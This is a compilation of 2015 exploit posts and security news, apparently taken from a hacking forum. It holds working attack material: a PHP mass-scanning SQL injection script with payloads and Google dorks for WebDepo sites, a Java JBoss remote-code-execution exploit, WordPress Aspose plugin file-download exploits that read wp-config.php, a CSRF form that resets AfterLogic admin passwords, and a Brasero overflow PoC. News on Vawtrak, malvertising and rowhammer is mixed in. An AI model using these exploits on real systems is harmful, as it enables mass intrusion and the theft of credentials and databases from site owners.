http://google.com/+INURLBrasil ========================== References: ========================== [1] http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html [2] https://msdn.microsoft.com/en-us/library/ff648339.aspx Exploit: <?php /* # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl # YOUTUBE: http://youtube.com/c/INURLBrasil # PLUS: http://google.com/+INURLBrasil # EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL # VENTOR: http://www.webdepot.co.il # GET VULN: wood=(id) # $wood=intval($_REQUEST['wood']) ----------------------------------------------------------------------------- # DBMS: 'MySQL' # Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # DBMS: 'Microsoft Access' # Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16 ----------------------------------------------------------------------------- # http://target.us/text.asp?wood=(id)+Exploit # GOOGLE DORK: inurl:"text.asp?wood=" # GOOGLE DORK: site:il inurl:"text.asp?wood=" # GOOGLE DORK: site:com inurl:"text.asp?wood=" # --help: -t : SET TARGET. -f : SET FILE TARGETS. -p : SET PROXY Execute: php WebDepoxpl.php -t target php WebDepoxpl.php -f targets.txt php WebDepoxpl.php -t target -p 'http://localhost:9090' ----------------------------------------------------------------------------- # EXPLOIT MASS USE SCANNER INURLBR # COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-all "php 0dayWebDepo.php -t '_TARGET_'" # DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR ----------------------------------------------------------------------------- # TUTORIAL: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); $folder_SqlMap = "python ../sqlmap/sqlmap.py"; $op_ = getopt('f:t:p:', array('help::')); echo " _____ (_____) ____ _ _ _ _ _____ _ ____ _ _ (() ()) |_ _| \ | | | | | __ \| | | _ \ (_) | \ / | | | \| | | | | |__) | | ______ | |_) |_ __ __ _ ___ _| | \ / | | | . ` | | | | _ /| | |______| | _ <| '__/ _` / __| | | /=\ _| |_| |\ | |__| | | \ \| |____ | |_) | | | (_| \__ \ | | [___] |_____|_| \_|\____/|_| \_\______| |____/|_| \__,_|___/_|_| \n\033[1;37m0xNeither war between hackers, nor peace for the system.\n [+] [Exploit]: MINI 3xplo1t-SqlMap - (0DAY) WebDepo -SQL injection / INURL BRASIL\nhelp: --help\033[0m\n\n"; $menu = " -t : SET TARGET. -f : SET FILE TARGETS. -p : SET PROXY Execute: php 0dayWebDepo.php -t target php 0dayWebDepo.php -f targets.txt php 0dayWebDepo.php -t target -p 'http://localhost:9090' \n"; echo isset($op_['help']) ? exit($menu) : NULL; $params = array( 'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL, 'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL, 'proxy' => not_isnull_empty($op_['p']) ? "--proxy '{$op_['p']}'" : NULL, 'folder' => $folder_SqlMap, 'line' => "-----------------------------------------------------------------------------------" ); not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL; not_isnull_empty($params['target']) ? __exec($params) . exit() : NULL; not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL; function not_isnull_empty($valor = NULL) { RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE; } function __plus() { ob_flush(); flush(); } function __listTarget($file) { $tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file'])))); echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS LOADED : " . count($tgt_) . "\033[0m\n"; foreach ($tgt_ as $url) { echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING : {$url} \033[0m\n"; __plus(); $file['target'] = $url; __exec($file) . __plus(); } } function __exec($params) { __plus(); echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO] starting SqlMap...\n"; echo "[+] [" . date("H:i:s") . "] [INFO] TARGET: {$params['target']}/text.asp?wood={SQL-INJECTION}\033[0m\n"; $command = "python ../sqlmap/sqlmap.py -u '{$params['target']}/text.asp?wood=1' -p wood --batch --dbms=MySQL {$params['proxy']} --random-agent --answers='follow=N' --dbs --level 2"; system($command, $dados) . empty($dados[0]) ? exit() : NULL; __plus(); } Source

Exploit Title : Wordpress Aaspose-pdf-exporter Plugin File Download Vulnerability Exploit Author : Ashiyane Digital Security Team Vendor Homepage: https://wordpress.org/plugins/aspose-pdf-exporter/ Download Link : https://downloads.wordpress.org/plugin/aspose-pdf-exporter.zip Date : 28 / 3 / 2015 Tested On : windows 8.1 + linux Kali ######################################### ######################################### ~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> Exploit: | | [+] Vulnerable file : 404 Not Found ~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> Vulnerable Code : <?php $file = $_GET['file']; $file_arr = explode('/',$file); $file_name = $file_arr[count($file_arr) - 1]; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file_name.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; ?> 404 Not Found[File Address] Examples : 404 Not Found ######################################### ######################################### Discovered by : Rq07 ######################################### Source: http://dl.packetstormsecurity.net/1503-exploits/wpaspose-disclose.txt

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title: Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/ | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip | [+] Tested on: Windows,Linux | | [+] Discovered By : ACC3SS |-------------------------------------------------------------------------| | [+] Exploit: | | [+] Vulnerable file : 404 Not Found | | [+] Vulnerable Code : <?php $file = $_GET['file']; $file_arr = explode('/',$file); $file_name = $file_arr[count($file_arr) - 1]; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file_name.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; ?> | [+] 404 Not Found[File Address] | [+] | [+] Examples : 404 Not Found |-------------------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||* Source: http://dl.packetstormsecurity.net/1503-exploits/wpasposede-disclose.txt Edit: Cer ca postul acesta s? fie ?ters dac? se poate , originally posted by Aerosol : https://rstforums.com/forum/99636-wordpress-aspose-doc-exporter-plugin-1-0-arbitrary-file-download-vulnerability.rst

/* * JBoss JMXInvokerServlet Remote Command Execution * JMXInvoker.java v0.3 - Luca Carettoni @_ikki * * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...). * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation" * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console" * and the "JMX Console" are protected or disabled. * * [FAQ] * * Q: Is my target vulnerable? * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable * * Q: How to fix it? * A: Enable authentication in "jmx-invoker-service.xml" * * Q: Is this exploit version-dependent? * A: Unfortunately, yes. An hash value is used to properly invoke a method. * At least comparing version 4.x and 5.x, these hashes are different. * * Q: How to compile and launch it? * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java * java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker * Yes, it's a Java exploit. I can already see some of you complaining.... */ import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.ObjectOutputStream; import java.lang.reflect.Array; import java.lang.reflect.Field; import java.lang.reflect.Method; import java.net.ConnectException; import java.net.HttpURLConnection; import java.net.URL; import javax.management.MalformedObjectNameException; import javax.management.ObjectName; import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir) public class JMXInvokerServlet { //---------> CHANGE ME <--------- static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1 static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet"; static final String cmd = "touch /tmp/exectest"; //------------------------------- public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException { System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]"); //Create a malicious Java serialized object MarshalledInvocation payload = new MarshalledInvocation(); payload.setObjectName(new Integer(hash)); //Executes the MBean invoke operation Class<?> c = Class.forName("javax.management.MBeanServerConnection"); Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class); payload.setMethod(method); //Define MBean's name, operation and pars Object myObj[] = new Object[4]; //MBean object name myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer"); //Operation name myObj[1] = new String("createScriptDeployment"); //Actual parameters myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"}; //Operation signature myObj[3] = new String[]{"java.lang.String", "java.lang.String"}; payload.setArguments(myObj); System.out.println("\n--[*] MarshalledInvocation object created"); //For debugging - visualize the raw object //System.out.println(dump(payload)); //Serialize the object try { //Send the payload URL server = new URL(url); HttpURLConnection conn = (HttpURLConnection) server.openConnection(); conn.setRequestMethod("POST"); conn.setDoOutput(true); conn.setDoInput(true); conn.setUseCaches(false); conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"); conn.setRequestProperty("Connection", "keep-alive"); conn.setRequestProperty("User-Agent", "Java/1.6.0_06"); conn.setRequestProperty("Content-Type", "application/octet-stream"); conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate"); conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation"); ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream()); wr.writeObject(payload); System.out.println("\n--[*] MarshalledInvocation object serialized"); System.out.println("\n--[*] Sending payload..."); wr.flush(); wr.close(); //Get the response InputStream is = conn.getInputStream(); BufferedReader rd = new BufferedReader(new InputStreamReader(is)); String line; StringBuffer response = new StringBuffer(); while ((line = rd.readLine()) != null) { response.append(line); } rd.close(); if (response.indexOf("Script Name") != -1) { System.out.println("\n--[*] \"" + cmd + "\" successfully executed"); } else { System.out.println("\n--[!] An invocation error occured..."); } } catch (ConnectException cex) { System.out.println("\n--[!] A connection error occured..."); } catch (IOException ex) { ex.printStackTrace(); } } /* * Raw dump of generic Java Objects */ static String dump(Object o) { StringBuffer buffer = new StringBuffer(); Class oClass = o.getClass(); if (oClass.isArray()) { buffer.append("["); for (int i = 0; i < Array.getLength(o); i++) { if (i > 0) { buffer.append(",\n"); } Object value = Array.get(o, i); buffer.append(value.getClass().isArray() ? dump(value) : value); } buffer.append("]"); } else { buffer.append("{"); while (oClass != null) { Field[] fields = oClass.getDeclaredFields(); for (int i = 0; i < fields.length; i++) { if (buffer.length() > 1) { buffer.append(",\n"); } fields[i].setAccessible(true); buffer.append(fields[i].getName()); buffer.append("="); try { Object value = fields[i].get(o); if (value != null) { buffer.append(value.getClass().isArray() ? dump(value) : value); } } catch (IllegalAccessException e) { } } oClass = oClass.getSuperclass(); } buffer.append("}"); } return buffer.toString(); } } Source

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title:Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/ | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip | [+] Tested on: Windows,Linux | | [+] Date : 2015-03-28 | [+] Discovered By : ACC3SS |-------------------------------------------------------------------------| | [+] Exploit: | | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php | | [+] Vulnerable Code : <?php $file = $_GET['file']; $file_arr = explode('/',$file); $file_name = $file_arr[count($file_arr) - 1]; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file_name.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; ?> | [+] http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File Address] | [+] | [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php |-------------------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||* Source

AfterLogic WebMail Lite is a free web-based IMAP and SMTP email-client with Ajax interface. AfterLogic WebMail Lite is available for both PHP and ASP.NET platforms. The version of AfterLogic WebMail Lite that is written in PHP is free and open-source software subject to the terms of the Affero General Public License (AGPL) version 3. The version written in ASP.NET is proprietary software available as freeware. And is deployed over 5/20 mailsevers, quite popular. This exploit attempts to exploit the admin and get(s) us a new password to the admin panel which should be located at site.com/mail/adminpanel/index.php <h2>After Logic Mail - Change Admin Password Exploit</h2> <form action="http://localhost/webmail/adminpanel/index.php?submit" method="POST" id="security_form"> <input type="hidden" name="form_id" value="security"> <input type="text" class="wm_input" name="txtUserName" id="txtUserName" value="mailadm" size="30" /> <input type="password" class="wm_input" name="txtNewPassword" id="txtNewPassword" value="newpass" size="30" /> <input type="password" class="wm_input" name="txtConfirmNewPassword" id="txtConfirmNewPassword" value="newpass" size="30" /> <input type="submit" name="submit_btn" value="Save" id="automate"> </form> <script> //uncomment the second line for automation //document.getElementById('automate').click(); </script> Source: http://dl.packetstormsecurity.net/1503-exploits/afterlogic-bypass.txt

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title:Wordpress Aspose-Cloud-eBook-Generator Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-cloud-ebook-generator/ | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-cloud-ebook-generator.zip | [+] Tested on: Windows,Linux | | [+] Discovered By : ACC3SS |-------------------------------------------------------------------------| | [+] Exploit: | | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php | | [+] Vulnerable Code : <?php $file = $_GET['file']; $file_arr = explode('/',$file); $file_name = $file_arr[count($file_arr) - 1]; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file_name.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; ?> | [+] http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=[File Address] | [+] | [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php |-------------------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||* Source

Security researcher has discovered some new features in the most dangerous Vawtrak, aka Neverquest, malware that allow it to send and receive data through encrypted favicons distributed over the secured Tor network. The researcher, Jakub Kroustek from AVG anti-virus firm, has provided an in-depth analysis (PDF) on the new and complex set of features of the malware which is considered to be one of the most dangerous threats in existence. Vawtrak is a sophisticated piece of malware in terms of supported features. It is capable of stealing financial information and executing transactions from the compromised computer remotely without leaving traces. The features include videos and screenshots capturing and launching man-in-the-middle attacks. HOW VAWTRAK SPREADS ? AVG anti-virus firm is warning users that it has discovered an ongoing campaign delivering Vawtrak to gain access to bank accounts visited by the victim and using the infamous Pony module in order to steal a wide range of victims’ login credentials. The Vawtrak Banking Trojan spreads by using one of the three ways: Drive-by download – spam email attachments or links to compromised sites Malware downloader – like Zemot or Chaintor Exploit kit – like as Angler Exploit Kit Mai multe aici: Dangerous 'Vawtrak Banking Trojan' Harvesting Passwords Worldwide - Hacker News Daca cineva detine sample rog pm.

It had to happen, we suppose: since even a utility-grade wind turbine might ship with a handy Webby control interface, someone was bound to do it badly. That's what's emerged in a new ICS-CERT advisory: CVE-2015-0985 details how turbines from US manufacturer XZERES allow the user name and password to be retrieved from the company's 442 SR turbine. As the advisory notes, “This exploit can cause a loss of power for all attached systems”. The turbine in question is, according to the company, “deployed across the energy sector” worldwide. It's part of a range of smaller-scale turbines from XZERES. The bug itself is basic: “The 442SR OS recognises both the POST and GET methods for data input,” the advisory states. “By using the GET method, an attacker may retrieve the username password from the browser and will allow the default user password to be changed. The default user has admin rights to the entire system.” Further, the bug is a cinch to exploit: “Crafting a working exploit for this vulnerability would be easy. There is no public exploit for this exact vulnerability. However, code exists online that can be easily modified to initiate a CSRF with this vulnerability.” As always, users of the wind turbine are advised to keep the kit behind firewalls and only allow remote access over a VPN. XZERES has issued a manual patch for the vulnerability. Source

#!/usr/bin/python #Exploit title: Brasero 3.4.1 'm3u' Buffer Overflow POC #Date Discovered: 15th March' 2015 # Exploit Author: Avinash Kumar Thapa "-Acid" # Vulnerable Software: Brasero 3.4.1 CD/DVD for the Gnome Desktop # Homepage:https://wiki.gnome.org/Apps/Brasero # Tested on: Kali Linux 1.0.9 buffer ="A"*26109 buffer += "CCCC" buffer += "D"*10500 file = "crash.m3u" f = open(file, "w") f.write(buffer) f.close() # After running exploit, run malicious file with brasero CD/DVD burner and check the crash which leads to logged out from your current session. ##################################################################### # -Acid # ##################################################################### Source

Attackers are using Flash exploits and foisting ransomware through real time advertising bidding networks, FireEye researchers say. The attacks link to malicious or compromised advertising sites which participate in real time bidding systems in which ad inventory is sold to and by publishers. More than 1700 malicious advertising requests have been detected that led to malicious .swf Flash files being downloaded over hundreds of unnamed sites. "We believe this activity is part of an active malvertising operation," FireEye Labs researchers say in an advisory. "These ads can come from ad servers that are part of a legitimate ad network or rogue ad servers controlled by attackers." The attacks target a vulnerability (CVE-2014-0569) patched October last year affecting Adobe Flash and Air which was integrated quickly into exploit kits including the popular Angler. Damage to victims varied; FireEye bods say attackers foisted both the dangerous Cryptowall ransomware and what appear to be benign Windows files. Two .swf files are loaded and load the exploit then throw up an unrelated advertisement which varied across attacks. Researchers probing deeper discovered the studied advertising sites used a tool dubbed 'F**k AdBlock' designed to detect 'nasty' ad blockers across popular web browsers. URLs involved in the advertising network revealed the bid pricing, impressions, and information on operating systems and web browsers. Malvertising is a popular method for infecting web users. Last month some 1800 subdomains linked to GoDaddy accounts were found spreading the Angler exploit kit using a then Flash zero day exploit in a surreptitious malvertising campaign. Source

In one of more impressive hacks in recent memory, researchers have devised an attack that exploits physical weaknesses in certain types of DDR memory chips to elevate the system rights of untrusted users of Intel-compatible PCs running Linux. The technique, outlined in a blog post published Monday by Google's Project Zero security initiative, works by reversing individual bits of data stored in DDR3 chip modules known as DIMMs. Last year, scientists proved that such "bit flipping" could be accomplished by repeatedly accessing small regions of memory, a feat that—like a magician who transforms a horse into a rabbit—allowed them to change the value of contents stored in computer memory. The research unveiled Monday showed how to fold such bit flipping into an actual attack. "The thing that is really impressive to me in what we see here is in some sense an analog- and manufacturing-related bug that is potentially exploitable in software," David Kanter, senior editor of the Microprocessor Report, told Ars. "This is reaching down into the underlying physics of the hardware, which from my standpoint is cool to see. In essence, the exploit is jumping several layers of the stack." Getting hammered DDR memory is laid out in an array of rows and columns, which are assigned in large blocks to various applications and operating system resources. To protect the integrity and security of the entire system, each large chunk of memory is contained in a "sandbox" that can be accessed only by a given app or OS process. Bit flipping works when a hacker-developed app or process accesses two carefully selected rows of memory hundreds of thousands of times in a tiny fraction of a second. By hammering the two "aggressor" memory regions, the exploit can reverse one or more bits in a third "victim" location. In other words, selected zeros in the victim region will turn into ones or vice versa. The ability to alter the contents of forbidden memory regions has far-reaching consequences. It can allow a user or application who has extremely limited system privileges to gain unfettered administrative control. From there, a hacker may be able to execute malicious code or hijack the operations of other users or software programs. Such elevation-of-privilege hacks are especially potent on servers available in data centers that are available to multiple customers. The vulnerability works only on newer types of DDR3 memory and is the result of the ever smaller dimensions of the silicon. With less space between each DRAM cell, it becomes increasingly hard to prevent one cell from interacting electrically with its neighbors. By repeatedly accessing one or more carefully selected memory locations, attackers can exploit this volatility, causing the charge to leak into or out of adjacent cells. With enough accesses, the technique can change the value of a cell. The attack doesn't work against newer DDR4 silicon or DIMMs that contain ECC, short for error correcting code, capabilities. Mark Seaborn, described as a "sandbox builder and breaker," along with reverse engineer Thomas Dullien, developed two "rowhammer" exploits that, when run as unprivileged processes, were able to gain kernel privileges on an x86-64 Linux system. The first exploit ran as a Native Client module on top of Google Chrome. Once Google developers became aware of the exploit, they disallowed the CLFLUSH instruction that's required to make the exploit work. The second exploit, which ran as a normal Linux process and gained access to all physical memory, will be harder to mitigate on existing machines. There are other things that made the exploits impressive. Irene Abezgauz, a product VP at Dyadic Security and an experienced penetration testing professional, told Ars: The attackers didn't identify the specific models of DDR3 that are susceptible to the attack. While their proof-of-concept exploits targeted a Linux computer running x86-64 hardware, the same technique would likely work against a variety of platforms. The results are impressive, but for a variety of reasons right now, the attacks appear to be more theoretical than practical. For one, the attack appears to allow only local, rather than remote, exploitation, a limitation that significantly curtails its appeal to real-world hackers. And for another, bit flipping works only against certain pre-determined rows. What's more, rowhammering requires more than 540,000 memory accesses in just 64 milliseconds. Unless refinements are made, the demands could make it impractical for attackers to use the technique to reliably hijack a system. Bit flipping shouldn't be mistaken as a class of memory corruption exploit, such as a buffer overflow or a use-after-free, both of which allow attackers to funnel malicious shell code into protected regions of a computer. Rowhammering, by contrast, allows for escalation of privileges, which while serious, is a much more nuanced type of incursion. Rob Graham, CEO of Errata Security, published this blog post that details additional challenges and technical details. Still, the ability to exploit physical weaknesses in the hardware is a highly novel type of attack that breaks new ground and may not be easy to remedy. "This is not like software, where in theory we can go patch the software and get a patch distributed via Windows update within the next two to three weeks," Kanter, of the Microprocessor Report, said. "If you want to actually fix this problem, we need to go out and replace, on a DIMM by DIMM basis, billions of dollars' worth of DRAM. From a practical standpoint that's not ever going to happen." Source

Sources: http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html https://code.google.com/p/google-security-research/issues/detail?id=283 Full PoC: http://www.exploit-db.com/sploits/36310.tar.gz This is a proof-of-concept exploit that is able to gain kernel privileges on machines that are susceptible to the DRAM "rowhammer" problem. It runs as an unprivileged userland process on x86-64 Linux. It works by inducing bit flips in page table entries (PTEs). For development purposes, the exploit program has a test mode in which it induces a bit flip by writing to /dev/mem. qemu_runner.py will run the exploit program in test mode in a QEMU VM. It assumes that "bzImage" (in the current directory) is a Linux kernel image that was built with /dev/mem enabled (specifically, with the the CONFIG_STRICT_DEVMEM option disabled). Mark Seaborn mseaborn@chromium.org March 2015 Source